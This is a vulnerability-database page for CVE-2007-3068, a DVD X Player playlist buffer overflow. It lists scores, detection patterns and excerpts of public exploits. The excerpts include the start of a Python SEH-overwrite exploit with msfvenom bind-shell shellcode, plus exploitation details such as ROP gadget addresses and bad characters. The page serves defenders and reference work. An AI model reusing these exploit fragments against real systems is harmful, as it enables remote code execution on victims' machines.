CVE-2007-3068
published 2007-06-06CVE-2007-3068: Stack-based buffer overflow in DVD X Player 4.1 Professional allows remote attackers to execute arbitrary code via a PLF playlist containing a long filename.
PriorityP344medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
32.95%
98.1th percentile
Stack-based buffer overflow in DVD X Player 4.1 Professional allows remote attackers to execute arbitrary code via a PLF playlist containing a long filename.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dvd-x-player | dvd_x_player | — | — |
| dvd_x_studios | dvd_x_player | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
SEH overwrite pattern: \xeb\x06\x90\x90 (next_seh jump) + \xdb\x2a\x60\x61 (pop/pop/ret EPG.dll)
bytes↗
Egghunter egg tag: \x54\x30\x30\x57\x54\x30\x30\x57 (W00TW00T doubled)
- →Monitor for MediaPlayerCtrl.dll (loaded by DVD X Player) performing a stack copy (rep movs) that triggers an access violation — indicative of the unbounded strcpy triggering the overflow. ↗
- →Detect the egghunter tag bytes W00T (\x54\x30\x30\x57) appearing twice consecutively in a .plf file, used to locate shellcode in memory. ↗
- →Alert on DVD X Player spawning unexpected child processes (e.g., cmd.exe, calc.exe) — the exploit payload executes arbitrary code under the user context. ↗
- →Look for ROP gadget addresses from EPG.dll (base around 0x6160xxxx–0x6164xxxx) and SkinScrollBar.dll (0x10011108) on the stack, indicating a DEP/ASLR bypass attempt against DVD X Player 5.5. ↗
- ·The original CVE-2007-3068 targets DVD X Player 4.1 Professional; the Metasploit module and additional exploits extend coverage to DVD X Player 5.5 Pro and Standard — ROP gadget addresses and offsets differ between versions. ↗
- ·The SEH overwrite exploit (17788) bypasses ASLR by relying on EPG.dll being a non-ASLR-enabled module; gadget addresses are fixed only when EPG.dll lacks ASLR. ↗
- ·Bad characters for payload encoding are \x00\x0a\x0d\x1a — shellcode must avoid these bytes to survive the filename parsing in MediaPlayerCtrl.dll. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-v6hw-hvgc-c65x: DVD X Player Standard 5
ghsa_unreviewed·2022-05-14·CVSS 6.8
CVE-2018-9128 [MEDIUM] CWE-119 GHSA-v6hw-hvgc-c65x: DVD X Player Standard 5
DVD X Player Standard 5.5.3.9 has a Buffer Overflow via a crafted .plf file, a related issue to CVE-2007-3068.
GHSA
GHSA-xh8w-m2v6-88j8: Stack-based buffer overflow in DVD X Player 4
ghsa_unreviewed·2022-05-01
CVE-2007-3068 [MEDIUM] GHSA-xh8w-m2v6-88j8: Stack-based buffer overflow in DVD X Player 4
Stack-based buffer overflow in DVD X Player 4.1 Professional allows remote attackers to execute arbitrary code via a PLF playlist containing a long filename.
No detection rules found.
Exploit-DB
DVD X Player 5.5 Pro - Local Overflow (SEH + ASLR + DEP Bypass)
exploitdb·2011-09-08
CVE-2007-3068 DVD X Player 5.5 Pro - Local Overflow (SEH + ASLR + DEP Bypass)
DVD X Player 5.5 Pro - Local Overflow (SEH + ASLR + DEP Bypass)
---
Exploit-DB
DVD X Player 5.5 Pro - Overwrite (SEH)
exploitdb·2011-09-06
CVE-2007-3068 DVD X Player 5.5 Pro - Overwrite (SEH)
DVD X Player 5.5 Pro - Overwrite (SEH)
---
# DVD X Player 5.5 Pro
# Bypass ASLR by using non-aslr enabled module
# SEH Overwrite
# Egghunter is not needed as there is at least 2000 bytes for shellcode
import sys
print "===================================="
print "DVD X Player 5.5 Pro Buffer Overflow"
print " SEH Overwrite - Bypass ASLR "
print " Written by Blake "
print "===================================="
# size = 325 bytes
# ./msfvenom -p windows/shell/bind_tcp LPORT=8080 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x1a' -f c
shellcode=(
"\xba\x16\x44\x8a\xd1\xdb\xd1\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
"\x4b\x31\x55\x14\x83\xc5\x04\x03\x55\x10\xf4\xb1\x76\x39\x71"
"\x39\x87\xba\xe1\xb3\x62\x8b\x33\xa7\xe7\xbe\x83\xa3\xaa\x32"
"\x68\xe1\x5e\xc0\x1c\x2e\x50\x61\xaa\x08\x5f\x72\x1b\x95\x33"
Exploit-DB
DVD X Player 5.5 - '.plf' Playlist Buffer Overflow (Metasploit)
exploitdb·2011-09-01
CVE-2007-3068 DVD X Player 5.5 - '.plf' Playlist Buffer Overflow (Metasploit)
DVD X Player 5.5 - '.plf' Playlist Buffer Overflow (Metasploit)
---
##
# $Id: dvdx_plf_bof.rb 13673 2011-09-01 05:20:47Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 "DVD X Player 5.5 .plf PlayList Buffer Overflow",
'Description' => %q{
This module exploits a stack-based buffer overflow on DVD X Player 5.5 Pro and
Standard. By supplying a long string of data in a plf file (playlist), the
MediaPlayerCtrl.dll component will attempt to extract a filename out of the string,
and then copy it on the stack without any proper bounds chec
Exploit-DB
DVD X Player 4.1 Professional - '.PLF' File Buffer Overflow
exploitdb·2007-06-02
CVE-2007-3068 DVD X Player 4.1 Professional - '.PLF' File Buffer Overflow
DVD X Player 4.1 Professional - '.PLF' File Buffer Overflow
---
#!/usr/bin/env ruby
####################################################################################################
#0day DVD X Player 4.1 Professional .PLF file buffer over flow found by n00b and poc by n00b.
#First of all DVD x is prone to a buffer-overflow when playing an overly long file name inside
#A .plf file Which is InterVideo WinDVD Play list File but also Dvd x uses this file as a play
#list file.Also the seh handlers got smashed so seh over-write is possible.Upon successful
#Exploitation calc will open and if it don't make sure you have the right jmp esp%
#Tested on :win xp service pack 2
#Vendors web site: http://www.dvd-x-player.com/
#Esp was pointing 277 byte's in to the buffer.
#And eip was over written
Metasploit
DVD X Player 5.5 .plf PlayList Buffer Overflow
metasploit
DVD X Player 5.5 .plf PlayList Buffer Overflow
DVD X Player 5.5 .plf PlayList Buffer Overflow
This module exploits a stack-based buffer overflow on DVD X Player 5.5 Pro and Standard. By supplying a long string of data in a plf file (playlist), the MediaPlayerCtrl.dll component will attempt to extract a filename out of the string, and then copy it on the stack without any proper bounds checking, which causes a buffer overflow, and results in arbitrary code execution under the context of the user. This module has been designed to target common Windows systems such as: Windows XP SP2/SP3, Windows Vista, and Windows 7.
No writeups or analysis indexed.
http://osvdb.org/36956http://secunia.com/advisories/25508http://www.securityfocus.com/bid/24278http://www.vupen.com/english/advisories/2007/2043https://exchange.xforce.ibmcloud.com/vulnerabilities/34690https://www.exploit-db.com/exploits/4024http://osvdb.org/36956http://secunia.com/advisories/25508http://www.securityfocus.com/bid/24278http://www.vupen.com/english/advisories/2007/2043https://exchange.xforce.ibmcloud.com/vulnerabilities/34690https://www.exploit-db.com/exploits/4024
2007-06-06
Published